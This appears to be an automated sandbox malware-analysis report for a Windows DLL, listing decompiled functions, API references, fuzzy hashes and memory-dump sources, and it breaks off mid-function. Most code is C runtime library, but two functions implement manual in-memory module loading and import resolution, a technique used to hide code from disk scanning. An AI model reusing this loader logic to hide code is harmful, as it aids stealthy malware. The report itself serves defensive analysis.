0x10005114
0x10005181
0x10005181
0x10005094
0x10005094
0x10005097
0x10005097
0x1000509a
0x1000509c
0x00000000
0x1000509c
0x10005092
0x1000506d
0x1000506d
0x10005072
0x00000000
0x10005072
0x1000505b
0x1000505b
0x10005060
0x10005078
0x10005078
0x1000507c
0x1000507c
0x1000518e
0x10005040
0x10005044
0x10005044

APIs

__ioinit.LIBCMT ref: 10005037

Part of subcall function 100076DE: InitOnceExecuteOnce.KERNEL32(10013300,10007719,00000000,00000000), ref: 100076EC

Memory Dump Source

Source File: 00000007.00000002.2115780820.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2115770180.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2115805909.000000001000D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2115830382.0000000010012000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2115840908.0000000010015000.00000002.00020000.sdmp Download File

Similarity

API ID: Once$ExecuteInit__ioinit
String ID:
API String ID: 129814473-0
Opcode ID: 094f6d4174cdee5f7286b7252394e54f5dc20bac084be214e94df9e6538c1141
Instruction ID: 32086827ce60b9a2cbb99d25a0e80922b058c4e771a23cab2cd98d30bef894a1
Opcode Fuzzy Hash: 094f6d4174cdee5f7286b7252394e54f5dc20bac084be214e94df9e6538c1141
Instruction Fuzzy Hash: 4A41F171900B059FF324CF68C851BAB77E4DF453E2B10871DE8B6C62D9E676E9408B50

Uniqueness

Uniqueness Score: -1.00%

Function 10004A66, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E10004A66(void* __ebx, void* __edx, void* __edi, void* __eflags, intOrPtr _a4) {
				char* _v16;
				char _v28;
				signed char _v32;
				void* _t10;
				void* _t19;
				intOrPtr* _t22;
				void* _t24;
				void* _t25;
				intOrPtr* _t27;

				_t25 = __edi;
				_t24 = __edx;
				_t19 = __ebx;
				while(1) {
					_t10 = E10008E67(_t19, _t24, _t25, _a4);
					if(_t10 != 0) {
						break;
					}
					if(E10009026(_t10, _a4) == 0) {
						_push(1);
						_t22 =  &_v28;
						_v16 = "bad allocation";
						E10008F1E(_t22,  &_v16);
						_v28 = 0x1000e460;
						E10009059( &_v28, 0x10010b04);
						asm("int3");
						_t27 = _t22;
						 *_t27 = 0x1000e460;
						E10008F5C(_t22);
						if((_v32 & 0x00000001) != 0) {
							L10003800(_t27);
						}
						return _t27;
					} else {
						continue;
					}
					L7:
				}
				return _t10;
				goto L7;
			}

0x10004a66
0x10004a66
0x10004a66
0x10004a7b
0x10004a7e
0x10004a86
0x00000000
0x00000000
0x10004a79
0x10004a8a
0x10004a90
0x10004a93
0x10004a9a
0x10004aa8
0x10004aaf
0x10004ab4
0x10004ab9
0x10004abb
0x10004ac1
0x10004aca
0x10004acd
0x10004ad2
0x10004ad7
0x00000000
0x00000000
0x00000000
0x00000000
0x10004a79
0x10004a89
0x00000000

APIs

_malloc.LIBCMT ref: 10004A7E

Part of subcall function 10008E67: __FF_MSGBANNER.LIBCMT ref: 10008E7E
Part of subcall function 10008E67: __NMSG_WRITE.LIBCMT ref: 10008E85
Part of subcall function 10008E67: HeapAlloc.KERNEL32(00580000,00000000,00000001,00000000,?,00000000,?,10007F7D,1000E4A0,1000E4A0,1000E4A0,?,?,10009274,00000018,10010E08), ref: 10008EAA

std::exception::exception.LIBCMT ref: 10004A9A
__CxxThrowException@8.LIBCMT ref: 10004AAF

Part of subcall function 10009059: RaiseException.KERNEL32(?,?,?,10010B04,?,?,?,10004AB4,?,10010B04,00000000,00000001), ref: 100090AA

Strings

`, xrefs: 10004AA8
h, xrefs: 10004A93

Memory Dump Source

Source File: 00000007.00000002.2115780820.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2115770180.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2115805909.000000001000D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2115830382.0000000010012000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2115840908.0000000010015000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocExceptionException@8HeapRaiseThrow_mallocstd::exception::exception
String ID: `$h
API String ID: 1059622496-773005782
Opcode ID: 8198483a73eec0a2752513ca626908b84cd43bbea8819fe80895fe02013f144e
Instruction ID: ad3e8221741d280e2df0066782729e531edcb1fd3c4a4238d597797a5e5b62a6
Opcode Fuzzy Hash: 8198483a73eec0a2752513ca626908b84cd43bbea8819fe80895fe02013f144e
Instruction Fuzzy Hash: C2F028B550024D6AFB00DBA8DC01ADF77ACEF023C4F114426F900A2149CFB1AA4087AA

Uniqueness

Uniqueness Score: -1.00%

Function 1000B39B, Relevance: 7.6, APIs: 5, Instructions: 67
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E1000B39B(void* __ebx, void* __edx, void* __edi, void* _a4, long _a8) {
				void* _t7;
				void* _t8;
				intOrPtr* _t9;
				intOrPtr* _t12;
				void* _t20;
				long _t31;

				if(_a4 != 0) {
					_t31 = _a8;
					if(_t31 != 0) {
						_push(__ebx);
						while(_t31 <= 0xffffffe0) {
							if(_t31 == 0) {
								_t31 = _t31 + 1;
							}
							_t7 = HeapReAlloc( *0x100132fc, 0, _a4, _t31);
							_t20 = _t7;
							if(_t20 != 0) {
								L17:
								_t8 = _t20;
							} else {
								if( *0x10013c2c == _t7) {
									_t9 = E10005EC6();
									 *_t9 = E10005ED9(GetLastError());
									goto L17;
								} else {
									if(E10009026(_t7, _t31) == 0) {
										_t12 = E10005EC6();
										 *_t12 = E10005ED9(GetLastError());
										L12:
										_t8 = 0;
									} else {
										continue;
									}
								}
							}
							goto L14;
						}
						E10009026(_t6, _t31);
						 *((intOrPtr*)(E10005EC6())) = 0xc;
						goto L12;
					} else {
						E10004732(_a4);
						_t8 = 0;
					}
					L14:
					return _t8;
				} else {
					return E10008E67(__ebx, __edx, __edi, _a8);
				}
			}

0x1000b3a2
0x1000b3b0
0x1000b3b5
0x1000b3c4
0x1000b3f7
0x1000b3c9
0x1000b3cb
0x1000b3cb
0x1000b3d8
0x1000b3de
0x1000b3e2
0x1000b442
0x1000b442
0x1000b3e4
0x1000b3ea
0x1000b42c
0x1000b440
0x00000000
0x1000b3ec
0x1000b3f5
0x1000b414
0x1000b428
0x1000b40e
0x1000b40e
0x00000000
0x00000000
0x00000000
0x1000b3f5
0x1000b3ea
0x00000000
0x1000b410
0x1000b3fd
0x1000b408
0x00000000
0x1000b3b7
0x1000b3ba
0x1000b3c0
0x1000b3c0
0x1000b411
0x1000b413
0x1000b3a4
0x1000b3ae
0x1000b3ae

APIs

_malloc.LIBCMT ref: 1000B3A7

Part of subcall function 10008E67: __FF_MSGBANNER.LIBCMT ref: 10008E7E
Part of subcall function 10008E67: __NMSG_WRITE.LIBCMT ref: 10008E85
Part of subcall function 10008E67: HeapAlloc.KERNEL32(00580000,00000000,00000001,00000000,?,00000000,?,10007F7D,1000E4A0,1000E4A0,1000E4A0,?,?,10009274,00000018,10010E08), ref: 10008EAA

_free.LIBCMT ref: 1000B3BA

Memory Dump Source

Source File: 00000007.00000002.2115780820.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2115770180.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2115805909.000000001000D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2115830382.0000000010012000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2115840908.0000000010015000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocHeap_free_malloc
String ID:
API String ID: 2734353464-0
Opcode ID: 1470ddf5c31cb35418e52f366651dade25ef90282a91678f077e8ad7c8708cdc
Instruction ID: 18c43e679c10c76ba13cd9b028f176d48a0d2f42c637b465b0a36ca5614664b7
Opcode Fuzzy Hash: 1470ddf5c31cb35418e52f366651dade25ef90282a91678f077e8ad7c8708cdc
Instruction Fuzzy Hash: AD11E031404616AFFB24EF74DC4564F3BD4DF042E1F218425F9489A15ADB31DE409750

Uniqueness

Uniqueness Score: -1.00%

Function 1000883C, Relevance: 7.5, APIs: 5, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E1000883C(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				LONG* _t20;
				signed int _t25;
				void* _t29;
				void* _t31;
				LONG* _t33;
				void* _t34;

				_t29 = __edx;
				_t24 = __ebx;
				_push(0xc);
				_push(0x10010da8);
				E10008040(__ebx, __edi, __esi);
				_t31 = E10006087();
				_t25 =  *0x10012ae4; // 0xfffffffe
				if(( *(_t31 + 0x70) & _t25) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
					E100091AB(0xd);
					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
					_t33 =  *(_t31 + 0x68);
					 *(_t34 - 0x1c) = _t33;
					__eflags = _t33 -  *0x10012394; // 0x10012690
					if(__eflags != 0) {
						__eflags = _t33;
						if(__eflags != 0) {
							__eflags = InterlockedDecrement(_t33);
							if(__eflags == 0) {
								__eflags = _t33 - 0x10012690;
								if(__eflags != 0) {
									E10004732(_t33);
								}
							}
						}
						_t20 =  *0x10012394; // 0x10012690
						 *(_t31 + 0x68) = _t20;
						_t33 =  *0x10012394; // 0x10012690
						 *(_t34 - 0x1c) = _t33;
						InterlockedIncrement(_t33);
					}
					 *(_t34 - 4) = 0xfffffffe;
					E100088D8();
				} else {
					_t33 =  *(_t31 + 0x68);
				}
				_t38 = _t33;
				if(_t33 == 0) {
					E1000743E(_t24, _t29, _t31, _t33, _t38, 0x20);
				}
				return E10008085(_t33);
			}

0x1000883c
0x1000883c
0x1000883c
0x1000883e
0x10008843
0x1000884d
0x1000884f
0x10008858
0x10008879
0x1000887f
0x10008883
0x10008886
0x10008889
0x1000888f
0x10008891
0x10008893
0x1000889c
0x1000889e
0x100088a0
0x100088a6
0x100088a9
0x100088ae
0x100088a6
0x1000889e
0x100088af
0x100088b4
0x100088b7
0x100088bd
0x100088c1
0x100088c1
0x100088c7
0x100088ce
0x10008860
0x10008860
0x10008860
0x10008863
0x10008865
0x10008869
0x1000886e
0x10008876

APIs

Part of subcall function 10006087: __getptd_noexit.LIBCMT ref: 10006088
Part of subcall function 10006087: __amsg_exit.LIBCMT ref: 10006095

__amsg_exit.LIBCMT ref: 10008869
__lock.LIBCMT ref: 10008879
InterlockedDecrement.KERNEL32(?), ref: 10008896
_free.LIBCMT ref: 100088A9
InterlockedIncrement.KERNEL32(10012690), ref: 100088C1

Memory Dump Source

Source File: 00000007.00000002.2115780820.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2115770180.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2115805909.000000001000D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2115830382.0000000010012000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2115840908.0000000010015000.00000002.00020000.sdmp Download File

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd_noexit__lock_free
String ID:
API String ID: 1231874560-0
Opcode ID: 30cc922b94fd66d93e4772b0e45363f14a3d134312cd16711b26b484a5aab7eb
Instruction ID: 6fa5c55f02b032b9b52f9637cbc65706c3d9556ef65a5339b15ab8c9acf7f00e
Opcode Fuzzy Hash: 30cc922b94fd66d93e4772b0e45363f14a3d134312cd16711b26b484a5aab7eb
Instruction Fuzzy Hash: 7901C075A016219BFB44EB64888578E77A0FF047D4F51800AE9886768CCF38AB91CFD2

Uniqueness

Uniqueness Score: -1.00%

Function 10001470, Relevance: 6.4, APIs: 5, Instructions: 143
COMMON

Download Yara Rule

C-Code - Quality: 48%

			E10001470(void* __ecx, intOrPtr* _a4) {
				intOrPtr _v8;
				void* _v12;
				intOrPtr _v16;
				intOrPtr _t44;
				signed short _t56;
				signed int _t58;
				intOrPtr _t60;
				intOrPtr _t64;
				intOrPtr _t65;
				void* _t67;
				intOrPtr* _t68;
				intOrPtr _t70;
				void _t71;
				signed short* _t72;
				intOrPtr _t73;
				intOrPtr _t77;
				intOrPtr* _t78;
				intOrPtr _t79;
				intOrPtr _t80;
				signed short* _t82;
				void* _t84;
				void* _t85;

				_t78 = _a4;
				_t65 =  *_t78;
				_t2 = _t78 + 4; // 0x4d8d5010
				_t79 =  *_t2;
				_a4 = _t79;
				if( *((intOrPtr*)(_t65 + 0x84)) == 0) {
					L22:
					return 1;
				} else {
					_t67 =  *((intOrPtr*)(_t65 + 0x80)) + _t79;
					_v12 = _t67;
					if(IsBadReadPtr(_t67, 0x14) == 0) {
						while(1) {
							_t44 =  *((intOrPtr*)(_t67 + 0xc));
							if(_t44 == 0) {
								goto L22;
							}
							_t8 = _t78 + 0x28; // 0x12f7805
							_t9 = _t78 + 0x1c; // 0xe58b0000
							_t80 =  *((intOrPtr*)( *_t9))(_t44 + _t79,  *_t8);
							_t85 = _t84 + 8;
							_v8 = _t80;
							if(_t80 == 0) {
								SetLastError(0x7e);
								return 0;
							} else {
								_t11 = _t78 + 0xc; // 0xd0ff0000
								_t14 = _t78 + 8; // 0x637e8ef
								_t70 = E10001DD0( *_t14, 4 +  *_t11 * 4);
								_t84 = _t85 + 8;
								if(_t70 == 0) {
									_t40 = _t78 + 0x28; // 0x12f7805
									_t41 = _t78 + 0x24; // 0x39c033cc
									 *((intOrPtr*)( *_t41))(_t80,  *_t40);
									SetLastError(0xe);
									return 0;
								} else {
									_t15 = _t78 + 0xc; // 0xd0ff0000
									 *((intOrPtr*)(_t78 + 8)) = _t70;
									_t77 = _t80;
									 *((intOrPtr*)(_t70 +  *_t15 * 4)) = _t77;
									 *(_t78 + 0xc) =  *(_t78 + 0xc) + 1;
									_t71 =  *_t67;
									if(_t71 == 0) {
										_t82 =  *((intOrPtr*)(_t67 + 0x10)) + _a4;
										_t72 = _t82;
									} else {
										_t64 = _a4;
										_t82 = _t71 + _t64;
										_t72 =  *((intOrPtr*)(_t67 + 0x10)) + _t64;
									}
									_t56 =  *_t82;
									if(_t56 == 0) {
										L17:
										_t67 = _t67 + 0x14;
										_v12 = _t67;
										if(IsBadReadPtr(_t67, 0x14) != 0) {
											goto L22;
										} else {
											_t79 = _a4;
											continue;
										}
									} else {
										_t73 = _t72 - _t82;
										_v16 = _t73;
										while(1) {
											_t27 = _t78 + 0x28; // 0x12f7805
											_push( *_t27);
											_t68 = _t73 + _t82;
											if(_t56 >= 0) {
												_t58 = _t56 + _a4 + 2;
											} else {
												_t58 = _t56 & 0x0000ffff;
											}
											_t30 = _t78 + 0x20; // 0xccccc35d
											_t60 =  *((intOrPtr*)( *_t30))(_t77, _t58);
											_t84 = _t84 + 0xc;
											 *_t68 = _t60;
											if(_t60 == 0) {
												break;
											}
											_t56 = _t82[2];
											_t73 = _v16;
											_t77 = _v8;
											_t82 =  &(_t82[2]);
											if(_t56 != 0) {
												continue;
											} else {
												_t67 = _v12;
												goto L17;
											}
											goto L23;
										}
										_t37 = _t78 + 0x28; // 0x12f7805
										_t39 = _t78 + 0x24; // 0x39c033cc
										 *((intOrPtr*)( *_t39))(_v8,  *_t37);
										SetLastError(0x7f);
										return 0;
									}
								}
							}
							goto L23;
						}
					}
					goto L22;
				}
				L23:
			}

0x10001479
0x1000147c
0x1000147e
0x1000147e
0x10001488
0x1000148b
0x100015db
0x100015e4
0x10001491
0x10001497
0x1000149c
0x100014a7
0x100014b0
0x100014b0
0x100014b5
0x00000000
0x00000000
0x100014bb
0x100014c1
0x100014c6
0x100014c8
0x100014cb
0x100014d0
0x100015c8
0x100015d6
0x100014d6
0x100014d6
0x100014e1
0x100014e9
0x100014eb
0x100014f0
0x100015a7
0x100015aa
0x100015ae
0x100015b5
0x100015c3
0x100014f6
0x100014f6
0x100014f9
0x100014fc
0x100014fe
0x10001501
0x10001504
0x10001508
0x1000151a
0x1000151d
0x1000150a
0x1000150a
0x1000150d
0x10001513
0x10001513
0x1000151f
0x10001523
0x1000156a
0x1000156a
0x10001570
0x1000157b
0x00000000
0x1000157d
0x1000157d
0x00000000
0x1000157d
0x10001525
0x10001525
0x10001527
0x10001530
0x10001530
0x10001530
0x10001533
0x10001538
0x10001545
0x1000153a
0x1000153a
0x1000153a
0x10001548
0x1000154c
0x1000154e
0x10001551
0x10001555
0x00000000
0x00000000
0x10001557
0x1000155a
0x1000155d
0x10001560
0x10001565
0x00000000
0x10001567
0x10001567
0x00000000
0x10001567
0x00000000
0x10001565
0x10001585
0x1000158b
0x1000158f
0x10001596
0x100015a4
0x100015a4
0x10001523
0x100014f0
0x00000000
0x100014d0
0x100014b0
0x00000000
0x100014a7
0x00000000

APIs

IsBadReadPtr.KERNEL32(?,00000014,00000000,00000000,00000000,100013CB), ref: 1000149F
SetLastError.KERNEL32(0000007E,?,?,?,?,?,?,?,?,10001B1F,00000000,100013CB,10001E80,10001E60,10001E50,00000000), ref: 100015C8

Part of subcall function 10001DD0: VirtualQuery.KERNEL32(0637E8EF,?,0000001C,100013CB,00000000,?,?,?,?,?,100014E9,0637E8EF,D0FF0000), ref: 10001DEA

IsBadReadPtr.KERNEL32(?,00000014,?,?,?,?,?,?,?,?,?,?,10001B1F,00000000,100013CB,10001E80), ref: 10001573
SetLastError.KERNEL32(0000007F), ref: 10001596
SetLastError.KERNEL32(0000000E,?,?,?,?,?,?,?,?,?,?,?,?,10001B1F,00000000,100013CB), ref: 100015B5

Memory Dump Source

Source File: 00000007.00000002.2115780820.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2115770180.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2115805909.000000001000D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2115830382.0000000010012000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2115840908.0000000010015000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast$Read$QueryVirtual
String ID:
API String ID: 4108280708-0
Opcode ID: bf404f711d3082d50f5bbd0f7f711224f62efa474e87bb40448eead53f7fc99f
Instruction ID: a489c81f2b48b45f7abe8d82c2fa530717afe034d23ef7191f16fae001b152d3
Opcode Fuzzy Hash: bf404f711d3082d50f5bbd0f7f711224f62efa474e87bb40448eead53f7fc99f
Instruction Fuzzy Hash: 02415E71600619EBEB10CF59DC80B99B7A8FF483A5F04416AED0ADB705D731E961CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 1000A35A, Relevance: 6.1, APIs: 4, Instructions: 96
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1000A35A(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				intOrPtr _v12;
				int _v20;
				int _t35;
				int _t38;
				int _t42;
				intOrPtr* _t44;
				int _t47;
				short* _t49;
				intOrPtr _t50;
				intOrPtr _t54;
				int _t55;
				int _t59;
				char* _t62;

				_t62 = _a8;
				if(_t62 == 0) {
					L5:
					return 0;
				}
				_t50 = _a12;
				if(_t50 == 0) {
					goto L5;
				}
				if( *_t62 != 0) {
					E1000476A( &_v20, _a16);
					_t35 = _v20;
					__eflags =  *(_t35 + 0xa8);
					if( *(_t35 + 0xa8) != 0) {
						_t38 = E1000A179( *_t62 & 0x000000ff,  &_v20);
						__eflags = _t38;
						if(_t38 == 0) {
							__eflags = _a4;
							_t59 = 1;
							_t42 = MultiByteToWideChar( *(_v20 + 4), 9, _t62, 1, _a4, 0 | _a4 != 0x00000000);
							__eflags = _t42;
							if(_t42 != 0) {
								L21:
								__eflags = _v8;
								if(_v8 != 0) {
									_t54 = _v12;
									_t31 = _t54 + 0x70;
									 *_t31 =  *(_t54 + 0x70) & 0xfffffffd;
									__eflags =  *_t31;
								}
								return _t59;
							}
							L20:
							_t44 = E10005EC6();
							_t59 = _t59 | 0xffffffff;
							__eflags = _t59;
							 *_t44 = 0x2a;
							goto L21;
						}
						_t59 = _v20;
						__eflags =  *(_t59 + 0x74) - 1;
						if( *(_t59 + 0x74) <= 1) {
							L15:
							__eflags = _t50 -  *(_t59 + 0x74);
							L16:
							if(__eflags < 0) {
								goto L20;
							}
							__eflags = _t62[1];
							if(_t62[1] == 0) {
								goto L20;
							}
							L18:
							_t59 =  *(_t59 + 0x74);
							goto L21;
						}
						__eflags = _t50 -  *(_t59 + 0x74);
						if(__eflags < 0) {
							goto L16;
						}
						__eflags = _a4;
						_t47 = MultiByteToWideChar( *(_t59 + 4), 9, _t62,  *(_t59 + 0x74), _a4, 0 | _a4 != 0x00000000);
						_t59 = _v20;
						__eflags = _t47;
						if(_t47 != 0) {
							goto L18;
						}
						goto L15;
					}
					_t55 = _a4;
					__eflags = _t55;
					if(_t55 != 0) {
						 *_t55 =  *_t62 & 0x000000ff;
					}
					_t59 = 1;
					goto L21;
				}
				_t49 = _a4;
				if(_t49 != 0) {
					 *_t49 = 0;
				}
				goto L5;
			}

0x1000a362
0x1000a367
0x1000a381
0x00000000
0x1000a381
0x1000a369
0x1000a36e
0x00000000
0x00000000
0x1000a373
0x1000a38e
0x1000a393
0x1000a396
0x1000a39d
0x1000a3bc
0x1000a3c3
0x1000a3c5
0x1000a409
0x1000a411
0x1000a420
0x1000a426
0x1000a428
0x1000a438
0x1000a438
0x1000a43c
0x1000a43e
0x1000a441
0x1000a441
0x1000a441
0x1000a441
0x00000000
0x1000a447
0x1000a42a
0x1000a42a
0x1000a42f
0x1000a42f
0x1000a432
0x00000000
0x1000a432
0x1000a3c7
0x1000a3ca
0x1000a3ce
0x1000a3f7
0x1000a3f7
0x1000a3fa
0x1000a3fa
0x00000000
0x00000000
0x1000a3fc
0x1000a400
0x00000000
0x00000000
0x1000a402
0x1000a402
0x00000000
0x1000a402
0x1000a3d0
0x1000a3d3
0x00000000
0x00000000
0x1000a3d7
0x1000a3ea
0x1000a3f0
0x1000a3f3
0x1000a3f5
0x00000000
0x00000000
0x00000000
0x1000a3f5
0x1000a39f
0x1000a3a2
0x1000a3a4
0x1000a3a9
0x1000a3a9
0x1000a3ae
0x00000000
0x1000a3ae
0x1000a375
0x1000a37a
0x1000a37e
0x1000a37e
0x00000000

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 1000A38E
__isleadbyte_l.LIBCMT ref: 1000A3BC
MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,100020F6,00000000,?,100020F6,?,?,?), ref: 1000A3EA
MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,100020F6,00000000,?,100020F6,?,?,?), ref: 1000A420

Memory Dump Source

Source File: 00000007.00000002.2115780820.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2115770180.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2115805909.000000001000D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2115830382.0000000010012000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2115840908.0000000010015000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: d9634a8e026aa07a820c9bcf7b7f3b6f286b4ef525d2eb9816761caa15114c1e
Instruction ID: 9d1cf0849eee1a075b18554553a91368e22c05569ceb8c6a927f46b954fbfb1a
Opcode Fuzzy Hash: d9634a8e026aa07a820c9bcf7b7f3b6f286b4ef525d2eb9816761caa15114c1e
Instruction Fuzzy Hash: 6231B035A00256AFEB11CF65C848BAE7BE5FF822D0F124628F850871A4E770E9D1DB90

Uniqueness

Uniqueness Score: -1.00%

Function 10006610, Relevance: 6.0, APIs: 4, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 20%

			E10006610(void* __ebx, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr* _a32, intOrPtr _a36, intOrPtr _a40) {
				void* __edi;
				void* __ebp;
				void* _t25;
				void* _t28;
				intOrPtr _t29;
				void* _t30;
				intOrPtr* _t31;
				void* _t33;

				_t30 = __esi;
				_t27 = __ebx;
				_t35 = _a28;
				_t29 = _a8;
				if(_a28 != 0) {
					_push(_a28);
					_push(_a24);
					_push(_t29);
					_push(_a4);
					E10006C38(__ebx, _t29, __esi, _t35);
					_t33 = _t33 + 0x10;
				}
				_t36 = _a40;
				_push(_a4);
				if(_a40 != 0) {
					_push(_a40);
				} else {
					_push(_t29);
				}
				E100042B0(_t28);
				_push(_t30);
				_t31 = _a32;
				_push( *_t31);
				_push(_a20);
				_push(_a16);
				_push(_t29);
				E10006E99(_t27, _t31, _t36);
				_push(0x100);
				_push(_a36);
				 *((intOrPtr*)(_t29 + 8)) =  *((intOrPtr*)(_t31 + 4)) + 1;
				_push( *((intOrPtr*)(_a24 + 0xc)));
				_push(_a20);
				_push(_a12);
				_push(_t29);
				_push(_a4);
				_t25 = E10006402(_t27, _t29, _t31, _t36);
				if(_t25 != 0) {
					E10004280(_t25, _t29);
					return _t25;
				}
				return _t25;
			}

0x10006610
0x10006610
0x10006613
0x10006618
0x1000661b
0x1000661d
0x10006620
0x10006623
0x10006624
0x10006627
0x1000662c
0x1000662c
0x1000662f
0x10006633
0x10006636
0x1000663b
0x10006638
0x10006638
0x10006638
0x1000663e
0x10006643
0x10006644
0x10006647
0x10006649
0x1000664c
0x1000664f
0x10006650
0x10006658
0x1000665d
0x10006661
0x10006667
0x1000666a
0x1000666d
0x10006670
0x10006671
0x10006674
0x1000667f
0x10006683
0x00000000
0x10006683
0x1000668a

APIs

___BuildCatchObject.LIBCMT ref: 10006627

Part of subcall function 10006C38: ___AdjustPointer.LIBCMT ref: 10006C81

_UnwindNestedFrames.LIBCMT ref: 1000663E
___FrameUnwindToState.LIBCMT ref: 10006650
CallCatchBlock.LIBCMT ref: 10006674

Memory Dump Source

Source File: 00000007.00000002.2115780820.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2115770180.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2115805909.000000001000D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2115830382.0000000010012000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2115840908.0000000010015000.00000002.00020000.sdmp Download File

Similarity

API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
String ID:
API String ID: 2633735394-0
Opcode ID: 38cfbb4d2267087fb04e53c3657a99f3c08a1c5c1ee859ea4b28d79f0814a6ce
Instruction ID: 929118807ddd2d015550d77d84a67e82c7ccc00f3a1cd5c495e14181e13c7b39
Opcode Fuzzy Hash: 38cfbb4d2267087fb04e53c3657a99f3c08a1c5c1ee859ea4b28d79f0814a6ce
Instruction Fuzzy Hash: D6014C72000109BBEF02CF55DC01EDA3BBAFF5C790F228119F91862124C732E961DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 100032A0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26COMMON

Download Yara Rule

APIs

StringFromGUID2.OLE32(?,?,00000027), ref: 100032CF
GetModuleFileNameW.KERNEL32(10000000,?,00000104,?,10002572,1000D260,80000002,A957EF0B), ref: 100032E3

Strings

Recipe (.recipe) Property Handler, xrefs: 100032A6

Memory Dump Source

Source File: 00000007.00000002.2115780820.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2115770180.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2115805909.000000001000D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2115830382.0000000010012000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2115840908.0000000010015000.00000002.00020000.sdmp Download File

Similarity

API ID: FileFromModuleNameString
String ID: Recipe (.recipe) Property Handler
API String ID: 1402647516-129706424
Opcode ID: 7ed536aff0d5137a22396f0237d134f3e1b2848668901a19bc3cda47405f2b17
Instruction ID: 6f8015bcf9db97dc62130dd9dbc2d8b03967e6a2f427fd85d2ca8f80d55362ab
Opcode Fuzzy Hash: 7ed536aff0d5137a22396f0237d134f3e1b2848668901a19bc3cda47405f2b17
Instruction Fuzzy Hash: 7AF01231510718AFD310DFA8C844E96B7E8EF09754F00851BF689D7610E7B0A544CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 10001980, Relevance: 5.1, APIs: 4, Instructions: 57
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E10001980(void* _a4) {
				void* _t15;
				void* _t16;
				void* _t20;
				intOrPtr _t23;
				void* _t30;
				signed int _t32;
				void* _t34;
				void* _t35;

				_t34 = _a4;
				if(_t34 == 0) {
					return _t15;
				}
				if( *((intOrPtr*)(_t34 + 0x10)) != 0) {
					_t30 =  *(_t34 + 4);
					 *((intOrPtr*)( *((intOrPtr*)( *_t34 + 0x28)) + _t30))(_t30, 0, 0);
				}
				if( *(_t34 + 8) == 0) {
					L10:
					_t16 =  *(_t34 + 4);
					if(_t16 != 0) {
						VirtualFree(_t16, 0, 0x8000);
					}
					return HeapFree(GetProcessHeap(), 0, _t34);
				} else {
					_t32 = 0;
					if( *((intOrPtr*)(_t34 + 0xc)) <= 0) {
						L8:
						_t20 =  *(_t34 + 8);
						if(_t20 != 0) {
							VirtualFree(_t20, 0, 0x8000);
						}
						goto L10;
					} else {
						goto L5;
					}
					do {
						L5:
						_t23 =  *((intOrPtr*)( *(_t34 + 8) + _t32 * 4));
						if(_t23 != 0) {
							 *((intOrPtr*)( *((intOrPtr*)(_t34 + 0x24))))(_t23,  *((intOrPtr*)(_t34 + 0x28)));
							_t35 = _t35 + 8;
						}
						_t32 = _t32 + 1;
